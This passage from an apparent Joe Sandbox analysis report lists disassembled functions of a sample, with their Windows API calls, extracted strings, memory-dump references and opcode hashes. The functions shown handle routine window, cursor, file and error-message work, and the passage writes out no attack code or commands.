                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                    • String ID: %s%u
                                    • API String ID: 3744389584-679674701
                                    • Opcode ID: 1ee29e932c5a8df0ae21fded329ff7d510d307983b188377a4ed6aaf5d99ba07
                                    • Instruction ID: d2d3f330db191583d9bbb630c708bc69d45f8f3e49d32ed93fe67c1af36856e3
                                    • Opcode Fuzzy Hash: 1ee29e932c5a8df0ae21fded329ff7d510d307983b188377a4ed6aaf5d99ba07
                                    • Instruction Fuzzy Hash: C1A1D771204706EFD718DF64C884FAAB7E8FF54314F24462AF999D2250DB30EA55CB92
                                    Function 008DAED4 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetClassNameW.USER32(00000008,?,00000400), ref: 008DAF18
                                    • _wcscmp.LIBCMT ref: 008DAF29
                                    • GetWindowTextW.USER32(00000001,?,00000400), ref: 008DAF51
                                    • CharUpperBuffW.USER32(?,00000000), ref: 008DAF6E
                                    • _wcscmp.LIBCMT ref: 008DAF8C
                                    • _wcsstr.LIBCMT ref: 008DAF9D
                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 008DAFD5
                                    • _wcscmp.LIBCMT ref: 008DAFE5
                                    • GetWindowTextW.USER32(00000002,?,00000400), ref: 008DB00C
                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 008DB055
                                    • _wcscmp.LIBCMT ref: 008DB065
                                    • GetClassNameW.USER32(00000010,?,00000400), ref: 008DB08D
                                    • GetWindowRect.USER32(00000004,?), ref: 008DB0F6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                    • String ID: @$ThumbnailClass
                                    • API String ID: 1788623398-1539354611
                                    • Opcode ID: ed219274d058c2101c6f60507acd1c75f3acdfd2e55aaa0626420c5ab4b96990
                                    • Instruction ID: 7eff77c6b8a1e5d7aa26d448c356ed7ffdc5a7e752c0b9976367d97aaaeee118
                                    • Opcode Fuzzy Hash: ed219274d058c2101c6f60507acd1c75f3acdfd2e55aaa0626420c5ab4b96990
                                    • Instruction Fuzzy Hash: D6819E71108209DFDB15DF14C881BAABBE8FF44714F14866AFD85CA296DB30DE49CB62
                                    Function 008DABD4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: __wcsnicmp
                                    • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                    • API String ID: 1038674560-1810252412
                                    • Opcode ID: 9d9328660f2548bb570bd0a868e80d006741c735847fbad62b782d19c997eef7
                                    • Instruction ID: 904f8a728d73d73c607da2f945c296b8c170bfd2b7a9b01d1a732f92a0dd5589
                                    • Opcode Fuzzy Hash: 9d9328660f2548bb570bd0a868e80d006741c735847fbad62b782d19c997eef7
                                    • Instruction Fuzzy Hash: 31319271548209A7DA24FA98DE03EAEB7A4FB10724F700526F441F15D1EB51AF04DA53
                                    Function 008F4FFD Relevance: 25.6, APIs: 17, Instructions: 110COMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadCursorW.USER32(00000000,00007F8A), ref: 008F5013
                                    • LoadCursorW.USER32(00000000,00007F00), ref: 008F501E
                                    • LoadCursorW.USER32(00000000,00007F03), ref: 008F5029
                                    • LoadCursorW.USER32(00000000,00007F8B), ref: 008F5034
                                    • LoadCursorW.USER32(00000000,00007F01), ref: 008F503F
                                    • LoadCursorW.USER32(00000000,00007F81), ref: 008F504A
                                    • LoadCursorW.USER32(00000000,00007F88), ref: 008F5055
                                    • LoadCursorW.USER32(00000000,00007F80), ref: 008F5060
                                    • LoadCursorW.USER32(00000000,00007F86), ref: 008F506B
                                    • LoadCursorW.USER32(00000000,00007F83), ref: 008F5076
                                    • LoadCursorW.USER32(00000000,00007F85), ref: 008F5081
                                    • LoadCursorW.USER32(00000000,00007F82), ref: 008F508C
                                    • LoadCursorW.USER32(00000000,00007F84), ref: 008F5097
                                    • LoadCursorW.USER32(00000000,00007F04), ref: 008F50A2
                                    • LoadCursorW.USER32(00000000,00007F02), ref: 008F50AD
                                    • LoadCursorW.USER32(00000000,00007F89), ref: 008F50B8
                                    • GetCursorInfo.USER32(?), ref: 008F50C8
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Cursor$Load$Info
                                    • String ID:
                                    • API String ID: 2577412497-0
                                    • Opcode ID: c06f23f4bb1283ad98d6300956c72d2c8bc9250ab19f009ae8d31c26e4e81b9d
                                    • Instruction ID: 69db20e77a00e4baaea8fae246bb8f752ee91303f7051353fbc124f1068886de
                                    • Opcode Fuzzy Hash: c06f23f4bb1283ad98d6300956c72d2c8bc9250ab19f009ae8d31c26e4e81b9d
                                    • Instruction Fuzzy Hash: D831F2B1D4871E6ADF109FB68C8996EBFE8FF04754F50453AE60DE7280DA78A5008F91
                                    Function 0090A1B9 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • _memset.LIBCMT ref: 0090A259
                                    • DestroyWindow.USER32(?,?), ref: 0090A2D3
                                      • Part of subcall function 00887BCC: _memmove.LIBCMT ref: 00887C06
                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0090A34D
                                    • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0090A36F
                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0090A382
                                    • DestroyWindow.USER32(00000000), ref: 0090A3A4
                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00880000,00000000), ref: 0090A3DB
                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0090A3F4
                                    • GetDesktopWindow.USER32 ref: 0090A40D
                                    • GetWindowRect.USER32(00000000), ref: 0090A414
                                    • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0090A42C
                                    • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0090A444
                                      • Part of subcall function 008825DB: GetWindowLongW.USER32(?,000000EB), ref: 008825EC
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                    • String ID: 0$tooltips_class32
                                    • API String ID: 1297703922-3619404913
                                    • Opcode ID: e4ff21166e15ad14e11c0dc7a2a62c767ee4c650eae9c39608ce1c41f27b12da
                                    • Instruction ID: ed553b17ff516f2310aca8e462fc591c2b35133363f133818cb6eac0d96b6786
                                    • Opcode Fuzzy Hash: e4ff21166e15ad14e11c0dc7a2a62c767ee4c650eae9c39608ce1c41f27b12da
                                    • Instruction Fuzzy Hash: 8D716675154304AFD721CF28C849F6A7BEAFB89704F04492DF9858B2B1DB71E902DB92
                                    Function 00904392 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CharUpperBuffW.USER32(?,?), ref: 00904424
                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0090446F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: BuffCharMessageSendUpper
                                    • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                    • API String ID: 3974292440-4258414348
                                    • Opcode ID: 54a005404d756aa8510a261d4e6d0903d9bb76abb6382207ac4761ff5dbdf100
                                    • Instruction ID: da16d2b2d47c295dde32e9b7c8e33aa715981e1edd864cfcd822ed6a8aa6f629
                                    • Opcode Fuzzy Hash: 54a005404d756aa8510a261d4e6d0903d9bb76abb6382207ac4761ff5dbdf100
                                    • Instruction Fuzzy Hash: A8918C702043119FCB14EF18C851A6EB7E5FF95354F088868F8969B7A2DB35ED49CB82
                                    Function 0090B7FE Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0090B8B4
                                    • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00906B11,?), ref: 0090B910
                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0090B949
                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 0090B98C
                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0090B9C3
                                    • FreeLibrary.KERNEL32(?), ref: 0090B9CF
                                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0090B9DF
                                    • DestroyCursor.USER32(?), ref: 0090B9EE
                                    • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0090BA0B
                                    • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0090BA17
                                      • Part of subcall function 008A2EFD: __wcsicmp_l.LIBCMT ref: 008A2F86
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Load$Image$LibraryMessageSend$CursorDestroyExtractFreeIcon__wcsicmp_l
                                    • String ID: .dll$.exe$.icl
                                    • API String ID: 3907162815-1154884017
                                    • Opcode ID: 26e8963aa014cea074f54fc8b61b4acf42838fb41036e216b29748bf4c14b7cc
                                    • Instruction ID: de2b61adf5d8cd86d6df9671f02228f5f574c7963f9d6ebeea392a3afec247b9
                                    • Opcode Fuzzy Hash: 26e8963aa014cea074f54fc8b61b4acf42838fb41036e216b29748bf4c14b7cc
                                    • Instruction Fuzzy Hash: 7261BE71500219BEEB24DF68CC41FBE77ACFB08724F104515F925D61D1DBB4AA90DBA0
                                    Function 008EDC1A Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 185timeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetLocalTime.KERNEL32(?), ref: 008EDCDC
                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 008EDCEC
                                    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 008EDCF8
                                    • __wsplitpath.LIBCMT ref: 008EDD56
                                    • _wcscat.LIBCMT ref: 008EDD6E
                                    • _wcscat.LIBCMT ref: 008EDD80
                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 008EDD95
                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 008EDDA9
                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 008EDDDB
                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 008EDDFC
                                    • _wcscpy.LIBCMT ref: 008EDE08
                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 008EDE47
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                    • String ID: *.*
                                    • API String ID: 3566783562-438819550
                                    • Opcode ID: 275677a83da3a23bfba990bc932fdc36fc786e0866e5a01de68e6ccf0b59b607
                                    • Instruction ID: ae966e7937258b83f8a71affba0437d20981f63dea7ef4442616068ed74b6bd5
                                    • Opcode Fuzzy Hash: 275677a83da3a23bfba990bc932fdc36fc786e0866e5a01de68e6ccf0b59b607
                                    • Instruction Fuzzy Hash: E9615B765043469FCB10EF69C8449AEB3E8FF8A314F04492DF999C7251DB31EA49CB92
                                    Function 008EA352 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00889837: __itow.LIBCMT ref: 00889862
                                      • Part of subcall function 00889837: __swprintf.LIBCMT ref: 008898AC
                                    • CharLowerBuffW.USER32(?,?), ref: 008EA3CB
                                    • GetDriveTypeW.KERNEL32 ref: 008EA418
                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 008EA460
                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 008EA497
                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 008EA4C5
                                      • Part of subcall function 00887BCC: _memmove.LIBCMT ref: 00887C06
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                    • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                    • API String ID: 2698844021-4113822522
                                    • Opcode ID: f750f1f80b4792af8ddac14c7f6c7d0ccd64407f5686e44fb08d346dc59b9aec
                                    • Instruction ID: 296da313601b60c31e1dd293bf2026c79826bbd7f39af9a8daff849be111b8f9
                                    • Opcode Fuzzy Hash: f750f1f80b4792af8ddac14c7f6c7d0ccd64407f5686e44fb08d346dc59b9aec
                                    • Instruction Fuzzy Hash: 995149751083059FC704EF15C89196AB7F4FF89718F14886DF89A972A1DB31EE09CB42
                                    Function 008DF8AA Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 138windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,008BE029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 008DF8DF
                                    • LoadStringW.USER32(00000000,?,008BE029,00000001), ref: 008DF8E8
                                      • Part of subcall function 00887DE1: _memmove.LIBCMT ref: 00887E22
                                    • GetModuleHandleW.KERNEL32(00000000,00945310,?,00000FFF,?,?,008BE029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 008DF90A
                                    • LoadStringW.USER32(00000000,?,008BE029,00000001), ref: 008DF90D
                                    • __swprintf.LIBCMT ref: 008DF95D
                                    • __swprintf.LIBCMT ref: 008DF96E
                                    • _wprintf.LIBCMT ref: 008DFA17
                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 008DFA2E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                    • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                    • API String ID: 984253442-2268648507
                                    • Opcode ID: c3b46ca31946a396908ab2909617fbb8baa448f8678133566b766c41439c94bf
                                    • Instruction ID: d978eee5da0b13fe4a3ed8fd024fbf464406b44eac73bde577913aca09d73278
                                    • Opcode Fuzzy Hash: c3b46ca31946a396908ab2909617fbb8baa448f8678133566b766c41439c94bf
                                    • Instruction Fuzzy Hash: 65415072804219AACB04FBE8DD56DEEB779FF14314F600065F606F2192EA316F09DB62
                                    Function 008BA8CB Relevance: 22.7, APIs: 15, Instructions: 211COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: _free$__malloc_crt__recalloc_crt_strlen$EnvironmentVariable___wtomb_environ__calloc_crt__getptd_noexit__invoke_watson_copy_environ
                                    • String ID:
                                    • API String ID: 884005220-0
                                    • Opcode ID: 047f4608bb287b2877f3e7c4fa37ceee47f5cb1862eafb70a9a9f8bb368469b1
                                    • Instruction ID: 3455ed94f9a783bbb853183d33ea0a79171ef9138d0e5816051b99f80d87370a
                                    • Opcode Fuzzy Hash: 047f4608bb287b2877f3e7c4fa37ceee47f5cb1862eafb70a9a9f8bb368469b1
                                    • Instruction Fuzzy Hash: BF610472508215EFEB289F7CD801BAA7BA8FF02320F214125E811E7391EB35D941DB63
                                    Function 0090BA33 Relevance: 22.6, APIs: 15, Instructions: 130filecommemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 0090BA56
                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 0090BA6D
                                    • GlobalAlloc.KERNEL32(00000002,00000000), ref: 0090BA78
                                    • CloseHandle.KERNEL32(00000000), ref: 0090BA85
                                    • GlobalLock.KERNEL32(00000000), ref: 0090BA8E
                                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0090BA9D
                                    • GlobalUnlock.KERNEL32(00000000), ref: 0090BAA6
                                    • CloseHandle.KERNEL32(00000000), ref: 0090BAAD
                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0090BABE
                                    • OleLoadPicture.OLEAUT32(?,00000000,00000000,00912CAC,?), ref: 0090BAD7
                                    • GlobalFree.KERNEL32(00000000), ref: 0090BAE7
                                    • GetObjectW.GDI32(?,00000018,000000FF), ref: 0090BB0B
                                    • CopyImage.USER32(?,00000000,?,?,00002000), ref: 0090BB36
                                    • DeleteObject.GDI32(00000000), ref: 0090BB5E
                                    • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0090BB74
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                    • String ID:
                                    • API String ID: 3840717409-0
                                    • Opcode ID: 0bc8bca8dcbcd5cb97913e64aefb7c2cd4cc9122bdf2105efcb270f0533e4b65
                                    • Instruction ID: d4407989d0e86340685c8f9ba5f7802713750e1fbb41cedd8950d611179eed0a
                                    • Opcode Fuzzy Hash: 0bc8bca8dcbcd5cb97913e64aefb7c2cd4cc9122bdf2105efcb270f0533e4b65
                                    • Instruction Fuzzy Hash: A4412775604208EFDB219F69DC98EAABBB8EB89B11F104068F905D72A0D7309E41DB60
                                    Function 008ED899 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON
                                    Download Yara Rule
                                    APIs
                                    • __wsplitpath.LIBCMT ref: 008EDA10
                                    • _wcscat.LIBCMT ref: 008EDA28
                                    • _wcscat.LIBCMT ref: 008EDA3A
                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 008EDA4F
                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 008EDA63
                                    • GetFileAttributesW.KERNEL32(?), ref: 008EDA7B
                                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 008EDA95
                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 008EDAA7
                                    Strings
                                    Memory Dump Source
